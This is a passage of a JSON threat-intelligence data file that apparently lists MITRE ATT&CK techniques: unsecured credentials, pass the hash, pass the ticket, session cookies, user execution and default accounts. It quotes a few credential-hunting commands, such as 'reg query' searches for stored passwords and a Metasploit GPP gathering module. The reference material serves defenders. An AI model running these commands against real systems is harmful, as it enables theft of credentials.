"description": "Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.\n\nIt is possible to extract passwords from backups or saved virtual machines through [OS Credential Dumping](https://app.tidalcyber.com/technique/368f85f9-2b15-4732-80fe-087694eaf34d). <sup>[[CG 2014](https://app.tidalcyber.com/references/46836549-f7e9-45e1-8d89-4d25ba26dbd7)]</sup> Passwords may also be obtained from Group Policy Preferences stored on the Windows Domain Controller. <sup>[[SRD GPP](https://app.tidalcyber.com/references/a15fff18-5d3f-4898-9e47-ec6ae7dda749)]</sup>\n\nIn cloud and/or containerized environments, authenticated user and service account credentials are often stored in local configuration and credential files.<sup>[[Unit 42 Hildegard Malware](https://app.tidalcyber.com/references/0941cf0e-75d8-4c96-bc42-c99d809e75f9)]</sup> They may also be found as parameters to deployment commands in container logs.<sup>[[Unit 42 Unsecured Docker Daemons](https://app.tidalcyber.com/references/efcbbbdd-9af1-46c2-8538-3fd22f2b67d2)]</sup> In some cases, these files can be copied and reused on another machine or the contents can be read and then used to authenticate without needing to copy any files.<sup>[[Specter Ops - Cloud Credential Storage](https://app.tidalcyber.com/references/95d6d1ce-ceba-48ee-88c4-0fb30058bd80)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1552.001"
},
"related": [
{
"dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53",
"type": "uses"
}
],
"uuid": "838c5038-91e7-4648-925e-a142c8c10853",
"value": "Credentials In Files"
},
{
"description": "Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.\n\nExample commands to find Registry keys related to password information: <sup>[[Pentestlab Stored Credentials](https://app.tidalcyber.com/references/5be9afb8-749e-45a2-8e86-b5e6dc167b41)]</sup>\n\n* Local Machine Hive: <code>reg query HKLM /f password /t REG_SZ /s</code>\n* Current User Hive: <code>reg query HKCU /f password /t REG_SZ /s</code>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1552.002"
},
"related": [
{
"dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53",
"type": "uses"
}
],
"uuid": "cdac2469-52ca-42a8-aefe-0321a7e3d658",
"value": "Credentials in Registry"
},
{
"description": "Adversaries may attempt to find unsecured credentials in Group Policy Preferences (GPP). GPP are tools that allow administrators to create domain policies with embedded credentials. These policies allow administrators to set local accounts.<sup>[[Microsoft GPP 2016](https://app.tidalcyber.com/references/fa3beaf1-81e7-411b-849a-24cffaf7c552)]</sup>\n\nThese group policies are stored in SYSVOL on a domain controller. This means that any domain user can view the SYSVOL share and decrypt the password (using the AES key that has been made public).<sup>[[Microsoft GPP Key](https://app.tidalcyber.com/references/24d8847b-d5de-4513-a55f-62c805dfa1dc)]</sup>\n\nThe following tools and scripts can be used to gather and decrypt the password file from Group Policy Preference XML files:\n\n* Metasploits post exploitation module: <code>post/windows/gather/credentials/gpp</code>\n* Get-GPPPassword<sup>[[Obscuresecurity Get-GPPPassword](https://app.tidalcyber.com/references/54351cf9-8d2a-47fb-92d5-fe64b628ab06)]</sup>\n* gpprefdecrypt.py\n\nOn the SYSVOL share, adversaries may use the following command to enumerate potential GPP XML files: <code>dir /s * .xml</code>\n",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1552.006"
},
"related": [
{
"dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53",
"type": "uses"
}
],
"uuid": "57dd1624-42e9-42a6-b1bb-d1d1df233138",
"value": "Group Policy Preferences"
},
{
"description": "Adversaries may search for private key certificate files on compromised systems for insecurely stored credentials. Private cryptographic keys and certificates are used for authentication, encryption/decryption, and digital signatures.<sup>[[Wikipedia Public Key Crypto](https://app.tidalcyber.com/references/1b7514e7-477d-44a2-acee-d1819066dee4)]</sup> Common key and certificate file extensions include: .key, .pgp, .gpg, .ppk., .p12, .pem, .pfx, .cer, .p7b, .asc. \n\nAdversaries may also look in common key directories, such as <code>~/.ssh</code> for SSH keys on * nix-based systems or <code>C:\\Users\\(username)\\.ssh\\</code> on Windows. Adversary tools may also search compromised systems for file extensions relating to cryptographic keys and certificates.<sup>[[Kaspersky Careto](https://app.tidalcyber.com/references/547f1a4a-7e4a-461d-8c19-f4775cd60ac0)]</sup><sup>[[Palo Alto Prince of Persia](https://app.tidalcyber.com/references/e08bfc40-a580-4fa3-9531-d5e1bede374e)]</sup>\n\nWhen a device is registered to Azure AD, a device key and a transport key are generated and used to verify the devices identity.<sup>[[Microsoft Primary Refresh Token](https://app.tidalcyber.com/references/d23bf6dc-979b-5f34-86a7-637979a5f20e)]</sup> An adversary with access to the device may be able to export the keys in order to impersonate the device.<sup>[[AADInternals Azure AD Device Identities](https://app.tidalcyber.com/references/b5ef16c4-1db0-51e9-93ab-54a8e480debc)]</sup>\n\nOn network devices, private keys may be exported via [Network Device CLI](https://app.tidalcyber.com/technique/284bfbb3-99f0-4c3d-bc1f-ab74065b7907) commands such as `crypto pki export`.<sup>[[cisco_deploy_rsa_keys](https://app.tidalcyber.com/references/132f387e-4ee3-51d3-a3b6-d61102ada152)]</sup> \n\nSome private keys require a password or passphrase for operation, so an adversary may also use [Input Capture](https://app.tidalcyber.com/technique/5ee96331-a7b7-4c32-a8f1-3fb164078f5f) for keylogging or attempt to [Brute Force](https://app.tidalcyber.com/technique/c16eef78-232e-47a2-98e9-046ec075b13c) the passphrase off-line. These private keys can be used to authenticate to [Remote Services](https://app.tidalcyber.com/technique/30ef3f13-5e9b-4712-9adf-f0da4ef157a1) like SSH or for use in decrypting other collected files such as email.",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1552.004"
},
"related": [
{
"dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53",
"type": "uses"
}
],
"uuid": "e493bf4a-0eba-4e60-a7a6-c699084dc98a",
"value": "Private Keys"
},
{
"description": "Adversaries may search compromised systems to find and obtain insecurely stored credentials. These credentials can be stored and/or misplaced in many locations on a system, including plaintext files (e.g. [Bash History](https://app.tidalcyber.com/technique/065d1cca-8ca5-4f8b-a333-2340706f589e)), operating system or application-specific repositories (e.g. [Credentials in Registry](https://app.tidalcyber.com/technique/cdac2469-52ca-42a8-aefe-0321a7e3d658)), or other specialized files/artifacts (e.g. [Private Keys](https://app.tidalcyber.com/technique/e493bf4a-0eba-4e60-a7a6-c699084dc98a)).",
"meta": {
"platforms": [
"Azure AD",
"Containers",
"Google Workspace",
"IaaS",
"Linux",
"macOS",
"Network",
"Office 365",
"SaaS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53",
"type": "uses"
},
{
"dest-uuid": "065d1cca-8ca5-4f8b-a333-2340706f589e",
"type": "similar"
},
{
"dest-uuid": "8e9cfd62-1a61-50dc-8f05-8a4914fd3853",
"type": "similar"
},
{
"dest-uuid": "a5a95893-d837-424a-979f-095a47dd9f34",
"type": "similar"
},
{
"dest-uuid": "6f6b88df-039c-4b69-87e0-97dfabbb49d8",
"type": "similar"
},
{
"dest-uuid": "838c5038-91e7-4648-925e-a142c8c10853",
"type": "similar"
},
{
"dest-uuid": "cdac2469-52ca-42a8-aefe-0321a7e3d658",
"type": "similar"
},
{
"dest-uuid": "57dd1624-42e9-42a6-b1bb-d1d1df233138",
"type": "similar"
},
{
"dest-uuid": "e493bf4a-0eba-4e60-a7a6-c699084dc98a",
"type": "similar"
}
],
"uuid": "02ed857b-ba39-4fab-b1d9-3ed2aa689dfd",
"value": "Unsecured Credentials"
},
{
"description": "Adversaries may create cloud instances in unused geographic service regions in order to evade detection. Access is usually obtained through compromising accounts used to manage cloud infrastructure.\n\nCloud service providers often provide infrastructure throughout the world in order to improve performance, provide redundancy, and allow customers to meet compliance requirements. Oftentimes, a customer will only use a subset of the available regions and may not actively monitor other regions. If an adversary creates resources in an unused region, they may be able to operate undetected.\n\nA variation on this behavior takes advantage of differences in functionality across cloud regions. An adversary could utilize regions which do not support advanced detection services in order to avoid detection of their activity.\n\nAn example of adversary use of unused AWS regions is to mine cryptocurrency through [Resource Hijacking](https://app.tidalcyber.com/technique/d10c4a15-aeaa-4630-a7a3-3373c89a584f), which can cost organizations substantial amounts of money over time depending on the processing power used.<sup>[[CloudSploit - Unused AWS Regions](https://app.tidalcyber.com/references/7c237b73-233f-4fe3-b4a6-ce523fd82853)]</sup>",
"meta": {
"platforms": [
"IaaS"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "edf9f7d7-bc14-4e25-800d-f508acb580d4",
"value": "Unused/Unsupported Cloud Regions"
},
{
"description": "Adversaries may use stolen application access tokens to bypass the typical authentication process and access restricted accounts, information, or services on remote systems. These tokens are typically stolen from users or services and used in lieu of login credentials.\n\nApplication access tokens are used to make authorized API requests on behalf of a user or service and are commonly used to access resources in cloud, container-based applications, and software-as-a-service (SaaS).<sup>[[Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019](https://app.tidalcyber.com/references/8ec52402-7e54-463d-8906-f373e5855018)]</sup> \n\nOAuth is one commonly implemented framework that issues tokens to users for access to systems. These frameworks are used collaboratively to verify the user and determine what actions the user is allowed to perform. Once identity is established, the token allows actions to be authorized, without passing the actual credentials of the user. Therefore, compromise of the token can grant the adversary access to resources of other sites through a malicious application.<sup>[[okta](https://app.tidalcyber.com/references/61e2fb16-d04b-494c-8bea-fb34e81faa73)]</sup>\n\nFor example, with a cloud-based email service, once an OAuth access token is granted to a malicious application, it can potentially gain long-term access to features of the user account if a \"refresh\" token enabling background access is awarded.<sup>[[Microsoft Identity Platform Access 2019](https://app.tidalcyber.com/references/a39d976e-9b52-48f3-b5db-0ffd84ecd338)]</sup> With an OAuth access token an adversary can use the user-granted REST API to perform functions such as email searching and contact enumeration.<sup>[[Staaldraad Phishing with OAuth 2017](https://app.tidalcyber.com/references/ae139c14-05ec-4c75-861b-15d86b4913fc)]</sup>\n\nCompromised access tokens may be used as an initial step in compromising other services. For example, if a token grants access to a victims primary email, the adversary may be able to extend access to all other services which the target subscribes by triggering forgotten password routines. In AWS and GCP environments, adversaries can trigger a request for a short-lived access token with the privileges of another user account.<sup>[[Google Cloud Service Account Credentials](https://app.tidalcyber.com/references/c4befa09-3c7f-49f3-bfcc-4fcbb7bace22)]</sup><sup>[[AWS Temporary Security Credentials](https://app.tidalcyber.com/references/c6f29134-5af2-42e1-af4f-fbb9eae03432)]</sup> The adversary can then use this token to request data or perform actions the original account could not. If permissions for this feature are misconfigured for example, by allowing all users to request a token for a particular account - an adversary may be able to gain initial access to a Cloud Account or escalate their privileges.<sup>[[Rhino Security Labs Enumerating AWS Roles](https://app.tidalcyber.com/references/f403fc54-bdac-415a-9cc0-78803dd84214)]</sup>\n\nDirect API access through a token negates the effectiveness of a second authentication factor and may be immune to intuitive countermeasures like changing passwords. For example, in AWS environments, an adversary who compromises a users AWS API credentials may be able to use the `sts:GetFederationToken` API call to create a federated user session, which will have the same permissions as the original user but may persist even if the original user credentials are deactivated.<sup>[[Crowdstrike AWS User Federation Persistence](https://app.tidalcyber.com/references/8c4f806c-b6f2-5bde-8525-05da6692e59c)]</sup> Additionally, access abuse over an API channel can be difficult to detect even from the service provider end, as the access can still align well with a legitimate workflow.",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1550.001"
},
"related": [
{
"dest-uuid": "50ba4930-7c8e-4ef9-bc36-70e7dae661eb",
"type": "uses"
},
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "8592f37d-850a-43d1-86f2-cc981ad7d7dc",
"value": "Application Access Token"
},
{
"description": "Adversaries may “pass the hash” using stolen password hashes to move laterally within an environment, bypassing normal system access controls. Pass the hash (PtH) is a method of authenticating as a user without having access to the user's cleartext password. This method bypasses standard authentication steps that require a cleartext password, moving directly into the portion of the authentication that uses the password hash.\n\nWhen performing PtH, valid password hashes for the account being used are captured using a [Credential Access](https://app.tidalcyber.com/tactics/0c3132d5-c0df-4793-b5f2-1a95bd64ab53) technique. Captured hashes are used with PtH to authenticate as that user. Once authenticated, PtH may be used to perform actions on local or remote systems.\n\nAdversaries may also use stolen password hashes to \"overpass the hash.\" Similar to PtH, this involves using a password hash to authenticate as a user but also uses the password hash to create a valid Kerberos ticket. This ticket can then be used to perform [Pass the Ticket](https://app.tidalcyber.com/technique/5e771f38-6286-4330-b7b4-38071ad6b68a) attacks.<sup>[[Stealthbits Overpass-the-Hash](https://app.tidalcyber.com/references/e0bf051c-21ab-4454-a6b0-31ae29b6e162)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1550.002"
},
"related": [
{
"dest-uuid": "50ba4930-7c8e-4ef9-bc36-70e7dae661eb",
"type": "uses"
},
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "33486e3e-1104-42d0-8053-34c8c9c4d10f",
"value": "Pass the Hash"
},
{
"description": "Adversaries may “pass the ticket” using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls. Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password. Kerberos authentication can be used as the first step to lateral movement to a remote system.\n\nWhen preforming PtT, valid Kerberos tickets for [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406) are captured by [OS Credential Dumping](https://app.tidalcyber.com/technique/368f85f9-2b15-4732-80fe-087694eaf34d). A user's service tickets or ticket granting ticket (TGT) may be obtained, depending on the level of access. A service ticket allows for access to a particular resource, whereas a TGT can be used to request service tickets from the Ticket Granting Service (TGS) to access any resource the user has privileges to access.<sup>[[ADSecurity AD Kerberos Attacks](https://app.tidalcyber.com/references/07ff57eb-1e23-433b-8da7-80f1caf7543e)]</sup><sup>[[GentilKiwi Pass the Ticket](https://app.tidalcyber.com/references/3ff12b9c-1c4e-4383-a771-792f5e95dcf1)]</sup>\n\nA [Silver Ticket](https://app.tidalcyber.com/technique/e7135af8-3668-4d94-90d2-2a93a6b5c327) can be obtained for services that use Kerberos as an authentication mechanism and are used to generate tickets to access that particular resource and the system that hosts the resource (e.g., SharePoint).<sup>[[ADSecurity AD Kerberos Attacks](https://app.tidalcyber.com/references/07ff57eb-1e23-433b-8da7-80f1caf7543e)]</sup>\n\nA [Golden Ticket](https://app.tidalcyber.com/technique/12efebf8-9da4-446c-a627-b6f95524f1ea) can be obtained for the domain using the Key Distribution Service account KRBTGT account NTLM hash, which enables generation of TGTs for any account in Active Directory.<sup>[[Campbell 2014](https://app.tidalcyber.com/references/8bef22ff-f2fc-4e1a-b4d2-d746a120f6c6)]</sup>\n\nAdversaries may also create a valid Kerberos ticket using other user information, such as stolen password hashes or AES keys. For example, \"overpassing the hash\" involves using a NTLM password hash to authenticate as a user (i.e. [Pass the Hash](https://app.tidalcyber.com/technique/33486e3e-1104-42d0-8053-34c8c9c4d10f)) while also using the password hash to create a valid Kerberos ticket.<sup>[[Stealthbits Overpass-the-Hash](https://app.tidalcyber.com/references/e0bf051c-21ab-4454-a6b0-31ae29b6e162)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1550.003"
},
"related": [
{
"dest-uuid": "50ba4930-7c8e-4ef9-bc36-70e7dae661eb",
"type": "uses"
},
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "5e771f38-6286-4330-b7b4-38071ad6b68a",
"value": "Pass the Ticket"
},
{
"description": "Adversaries can use stolen session cookies to authenticate to web applications and services. This technique bypasses some multi-factor authentication protocols since the session is already authenticated.<sup>[[Pass The Cookie](https://app.tidalcyber.com/references/dc67930f-5c7b-41be-97e9-d8f4a55e6019)]</sup>\n\nAuthentication cookies are commonly used in web applications, including cloud-based services, after a user has authenticated to the service so credentials are not passed and re-authentication does not need to occur as frequently. Cookies are often valid for an extended period of time, even if the web application is not actively used. After the cookie is obtained through [Steal Web Session Cookie](https://app.tidalcyber.com/technique/17f9e46d-4e3d-4491-a0d9-0cc042531d6e) or [Web Cookies](https://app.tidalcyber.com/technique/b0966c0f-1e09-4d5d-acff-0ca79dc9da89), the adversary may then import the cookie into a browser they control and is then able to use the site or application as the user for as long as the session cookie is active. Once logged into the site, an adversary can access sensitive information, read email, or perform actions that the victim account has permissions to perform.\n\nThere have been examples of malware targeting session cookies to bypass multi-factor authentication systems.<sup>[[Unit 42 Mac Crypto Cookies January 2019](https://app.tidalcyber.com/references/0a88e730-8ed2-4983-8f11-2cb2e4abfe3e)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1550.004"
},
"related": [
{
"dest-uuid": "50ba4930-7c8e-4ef9-bc36-70e7dae661eb",
"type": "uses"
},
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "d36a5323-e249-44e8-9c8b-5cc9c023a5e1",
"value": "Web Session Cookie"
},
{
"description": "Adversaries may use alternate authentication material, such as password hashes, Kerberos tickets, and application access tokens, in order to move laterally within an environment and bypass normal system access controls. \n\nAuthentication processes generally require a valid identity (e.g., username) along with one or more authentication factors (e.g., password, pin, physical smart card, token generator, etc.). Alternate authentication material is legitimately generated by systems after a user or application successfully authenticates by providing a valid identity and the required authentication factor(s). Alternate authentication material may also be generated during the identity creation process.<sup>[[NIST Authentication](https://app.tidalcyber.com/references/f3cfb9b9-62f4-4066-a2b9-7e6f25bd7a46)]</sup><sup>[[NIST MFA](https://app.tidalcyber.com/references/2f069bb2-3f59-409e-a337-7c69411c8b01)]</sup>\n\nCaching alternate authentication material allows the system to verify an identity has successfully authenticated without asking the user to reenter authentication factor(s). Because the alternate authentication must be maintained by the system—either in memory or on disk—it may be at risk of being stolen through [Credential Access](https://app.tidalcyber.com/tactics/0c3132d5-c0df-4793-b5f2-1a95bd64ab53) techniques. By stealing alternate authentication material, adversaries are able to bypass system access controls and authenticate to systems without knowing the plaintext password or any additional authentication factors.\n",
"meta": {
"platforms": [
"Containers",
"Google Workspace",
"IaaS",
"Office 365",
"SaaS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "50ba4930-7c8e-4ef9-bc36-70e7dae661eb",
"type": "uses"
},
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
},
{
"dest-uuid": "8592f37d-850a-43d1-86f2-cc981ad7d7dc",
"type": "similar"
},
{
"dest-uuid": "33486e3e-1104-42d0-8053-34c8c9c4d10f",
"type": "similar"
},
{
"dest-uuid": "5e771f38-6286-4330-b7b4-38071ad6b68a",
"type": "similar"
},
{
"dest-uuid": "d36a5323-e249-44e8-9c8b-5cc9c023a5e1",
"type": "similar"
}
],
"uuid": "28f65214-95c1-4a72-b385-0b32cbcaea8f",
"value": "Use Alternate Authentication Material"
},
{
"description": "An adversary may rely upon a user opening a malicious file in order to gain execution. Users may be subjected to social engineering to get them to open a file that will lead to code execution. This user action will typically be observed as follow-on behavior from [Spearphishing Attachment](https://app.tidalcyber.com/technique/ba553ad4-5699-4458-ae4e-76e1faa43291). Adversaries may use several types of files that require a user to execute them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, and .cpl.\n\nAdversaries may employ various forms of [Masquerading](https://app.tidalcyber.com/technique/a0adacc1-8d2a-4e0b-92c1-3766264df4fd) and [Obfuscated Files or Information](https://app.tidalcyber.com/technique/046cc07e-8700-4536-9c5b-6ecb384f52b0) to increase the likelihood that a user will open and successfully execute a malicious file. These methods may include using a familiar naming convention and/or password protecting the file and supplying instructions to a user on how to open it.<sup>[[Password Protected Word Docs](https://app.tidalcyber.com/references/fe6f3ee6-b0a4-4092-947b-48e02a9255c1)]</sup> \n\nWhile [Malicious File](https://app.tidalcyber.com/technique/3412ca73-2f25-452a-8e6e-5c28fe72ef78) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://app.tidalcyber.com/technique/4f4ea659-7653-4bfd-a525-b2af32c5899b).",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1204.002"
},
"related": [
{
"dest-uuid": "dad2337d-6d35-410a-acc5-da36ff83ee44",
"type": "uses"
}
],
"uuid": "3412ca73-2f25-452a-8e6e-5c28fe72ef78",
"value": "Malicious File"
},
{
"description": "Adversaries may rely on a user running a malicious image to facilitate execution. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be backdoored. Backdoored images may be uploaded to a public repository via [Upload Malware](https://app.tidalcyber.com/technique/8ecf5275-c6d1-4fe3-a24a-63fa1f3144fe), and users may then download and deploy an instance or container from the image without realizing the image is malicious, thus bypassing techniques that specifically achieve Initial Access. This can lead to the execution of malicious code, such as code that executes cryptocurrency mining, in the instance or container.<sup>[[Summit Route Malicious AMIs](https://app.tidalcyber.com/references/e93e16fc-4ae4-4f1f-9d80-dc48c1c30e25)]</sup>\n\nAdversaries may also name images a certain way to increase the chance of users mistakenly deploying an instance or container from the image (ex: [Match Legitimate Name or Location](https://app.tidalcyber.com/technique/442f60ed-5195-45c3-9d8c-7e17cabe7869)).<sup>[[Aqua Security Cloud Native Threat Report June 2021](https://app.tidalcyber.com/references/be9652d5-7531-4143-9c44-aefd019b7a32)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1204.003"
},
"related": [
{
"dest-uuid": "dad2337d-6d35-410a-acc5-da36ff83ee44",
"type": "uses"
}
],
"uuid": "f795ef6d-d2cf-440e-b871-ab19dc385789",
"value": "Malicious Image"
},
{
"description": "An adversary may rely upon a user clicking a malicious link in order to gain execution. Users may be subjected to social engineering to get them to click on a link that will lead to code execution. This user action will typically be observed as follow-on behavior from [Spearphishing Link](https://app.tidalcyber.com/technique/d08a9977-9fc2-46bb-84f9-dbb5187c426d). Clicking on a link may also lead to other execution techniques such as exploitation of a browser or application vulnerability via [Exploitation for Client Execution](https://app.tidalcyber.com/technique/068df3d7-f788-44e4-9e6b-2ae443af1609). Links may also lead users to download files that require execution via [Malicious File](https://app.tidalcyber.com/technique/3412ca73-2f25-452a-8e6e-5c28fe72ef78).",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1204.001"
},
"related": [
{
"dest-uuid": "dad2337d-6d35-410a-acc5-da36ff83ee44",
"type": "uses"
}
],
"uuid": "46f60fff-71a1-4cfd-b639-71a0ac903bbb",
"value": "Malicious Link"
},
{
"description": "An adversary may rely upon specific actions by a user in order to gain execution. Users may be subjected to social engineering to get them to execute malicious code by, for example, opening a malicious document file or link. These user actions will typically be observed as follow-on behavior from forms of [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533).\n\nWhile [User Execution](https://app.tidalcyber.com/technique/b84435ab-2ff4-4b6f-ba71-b4b815474872) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://app.tidalcyber.com/technique/4f4ea659-7653-4bfd-a525-b2af32c5899b).\n\nAdversaries may also deceive users into performing actions such as enabling [Remote Access Software](https://app.tidalcyber.com/technique/acf828f4-7e7e-43e1-bf15-ceab42021430), allowing direct control of the system to the adversary, or downloading and executing malware for [User Execution](https://app.tidalcyber.com/technique/b84435ab-2ff4-4b6f-ba71-b4b815474872). For example, tech support scams can be facilitated through [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533), vishing, or various forms of user interaction. Adversaries can use a combination of these methods, such as spoofing and promoting toll-free numbers or call centers that are used to direct victims to malicious websites, to deliver and execute payloads containing malware or [Remote Access Software](https://app.tidalcyber.com/technique/acf828f4-7e7e-43e1-bf15-ceab42021430).<sup>[[Telephone Attack Delivery](https://app.tidalcyber.com/references/9670da7b-0600-4072-9ecc-65a918b89ac5)]</sup>",
"meta": {
"platforms": [
"Containers",
"IaaS",
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "dad2337d-6d35-410a-acc5-da36ff83ee44",
"type": "uses"
},
{
"dest-uuid": "3412ca73-2f25-452a-8e6e-5c28fe72ef78",
"type": "similar"
},
{
"dest-uuid": "f795ef6d-d2cf-440e-b871-ab19dc385789",
"type": "similar"
},
{
"dest-uuid": "46f60fff-71a1-4cfd-b639-71a0ac903bbb",
"type": "similar"
}
],
"uuid": "b84435ab-2ff4-4b6f-ba71-b4b815474872",
"value": "User Execution"
},
{
"description": "Valid accounts in cloud environments may allow adversaries to perform actions to achieve Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application. Cloud Accounts can exist solely in the cloud or be hybrid joined between on-premises systems and the cloud through federation with other identity sources such as Windows Active Directory. <sup>[[AWS Identity Federation](https://app.tidalcyber.com/references/b55ac071-483b-4802-895f-ea4eaac1de92)]</sup><sup>[[Google Federating GC](https://app.tidalcyber.com/references/4e17ca9b-5c98-409b-9496-7c37fe9ee837)]</sup><sup>[[Microsoft Deploying AD Federation](https://app.tidalcyber.com/references/beeb460e-4dba-42fb-8109-0861cd0df562)]</sup>\n\nService or user accounts may be targeted by adversaries through [Brute Force](https://app.tidalcyber.com/technique/c16eef78-232e-47a2-98e9-046ec075b13c), [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533), or various other means to gain access to the environment. Federated accounts may be a pathway for the adversary to affect both on-premises systems and cloud environments.\n\nAn adversary may create long lasting [Additional Cloud Credentials](https://app.tidalcyber.com/technique/0799f2ee-3a83-452e-9fa9-83e91d83be25) on a compromised cloud account to maintain persistence in the environment. Such credentials may also be used to bypass security controls such as multi-factor authentication. \n\nCloud accounts may also be able to assume [Temporary Elevated Cloud Access](https://app.tidalcyber.com/technique/448dc009-2d3f-5480-aba3-0d80dc4336cd) or other privileges through various means within the environment. Misconfigurations in role assignments or role assumption policies may allow an adversary to use these mechanisms to leverage permissions outside the intended scope of the account. Such over privileged accounts may be used to harvest sensitive data from online storage accounts and databases through [Cloud API](https://app.tidalcyber.com/technique/af798e80-2cc5-5452-83e4-9560f08bf2d5) or other methods. \n",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1078.004"
},
"related": [
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
},
{
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
"type": "uses"
},
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
},
{
"dest-uuid": "586a5b49-c566-4a57-beb4-e7c667f9c34c",
"type": "uses"
}
],
"uuid": "3c4a2f3a-5877-4a27-a417-76318523657e",
"value": "Cloud Accounts - Duplicate"
},
{
"description": "Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.<sup>[[Microsoft Local Accounts Feb 2019](https://app.tidalcyber.com/references/6ae7487c-cb61-4f10-825f-4ef9ef050b7c)]</sup><sup>[[AWS Root User](https://app.tidalcyber.com/references/5f315c21-f02f-4c9e-aac6-d648deff3ff9)]</sup><sup>[[Threat Matrix for Kubernetes](https://app.tidalcyber.com/references/43fab719-e348-4902-8df3-8807765b95f0)]</sup>\n\nDefault accounts are not limited to client machines, rather also include accounts that are preset for equipment such as network devices and computer applications whether they are internal, open source, or commercial. Appliances that come preset with a username and password combination pose a serious threat to organizations that do not change it post installation, as they are easy targets for an adversary. Similarly, adversaries may also utilize publicly disclosed or stolen [Private Keys](https://app.tidalcyber.com/technique/e493bf4a-0eba-4e60-a7a6-c699084dc98a) or credential materials to legitimately connect to remote environments via [Remote Services](https://app.tidalcyber.com/technique/30ef3f13-5e9b-4712-9adf-f0da4ef157a1).<sup>[[Metasploit SSH Module](https://app.tidalcyber.com/references/e4ae69e5-67ba-4a3e-8101-5e7f073bd312)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1078.001"
},
"related": [
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
},
{
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
"type": "uses"
},
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
},
{
"dest-uuid": "586a5b49-c566-4a57-beb4-e7c667f9c34c",
"type": "uses"
}
],
"uuid": "6c55cf9c-0259-4ba0-9574-e90f6c88e6fd",
"value": "Default Accounts"
},
{
